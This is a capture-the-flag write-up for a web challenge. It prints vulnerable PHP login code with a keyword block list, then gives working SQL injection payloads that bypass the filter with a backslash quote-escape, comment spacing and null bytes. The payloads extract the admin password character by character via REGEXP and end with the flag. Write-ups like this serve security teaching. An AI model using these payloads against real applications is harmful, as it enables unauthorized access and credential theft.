# ▼▼▼Old School SQL(Web:150)▼▼▼

**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

```
Being the admin is great
Link(http://35.200.215.237/)
```

---

## 【view source code】

`http://35.200.215.237/`

↓

```
query : select user from chal where user='' and pw=''
|-|chal|_|\.|\(\)|#|and|if|database|where|concat|insert|having|sleep/i";
if(preg_match($black_list, $_GET['user'])) exit(":P");
if(preg_match($black_list, $_GET['pw'])) exit(":P");

$query="select user from chal where user='$_GET[user]' and pw='$_GET[pw]'";

$result = mysql_query($query);
$result = mysql_fetch_array($result);
$admin_pass = mysql_fetch_array(mysql_query("select pw from chal where user='admin'"));
echo "<h1>query : {$query}
</h1>";
if($result['user']) echo "<h2>Welcome {$result['user']}</h2>";
if(($admin_pass['pw'])&&($admin_pass['pw'] === $_GET['pw'])){
echo $flag;
}

highlight_file(__FILE__);

?>
```

---

## 【exploit】

GET /?user=`\`&pw=`||user/**/REGEXP/**/%22admi%22||%22n%22;%00`

↓

Welcome admin

---

GET /?user=`\`&pw=`||pw/**/REGEXP/**/%22^1%22;%00` ⇒Welcome admin

GET /?user=`\`&pw=`||pw/**/REGEXP/**/%22^17%22;%00` ⇒Welcome admin

GET /?user=`\`&pw=`||pw/**/REGEXP/**/%22^172%22;%00` ⇒Welcome admin

GET /?user=`\`&pw=`||pw/**/REGEXP/**/%22^1729%22;%00` ⇒Welcome admin

GET /?user=`\`&pw=`||pw/**/REGEXP/**/%22^17292%22;%00` ⇒Welcome admin

GET /?user=`\`&pw=`||pw/**/REGEXP/**/%22^172921%22;%00` ⇒Welcome admin

GET /?user=`\`&pw=`||pw/**/REGEXP/**/%22^1729211%22;%00` ⇒Welcome admin

GET /?user=`\`&pw=`||pw/**/REGEXP/**/%22^17292115%22;%00` ⇒Welcome admin

↓

admin's password is `17292115`

---

## 【Enter admin's password】

http://35.200.215.237/?pw=`17292115`

↓

`flag{sQ1_inj3c7i0n_i5_v3ry_3asy}`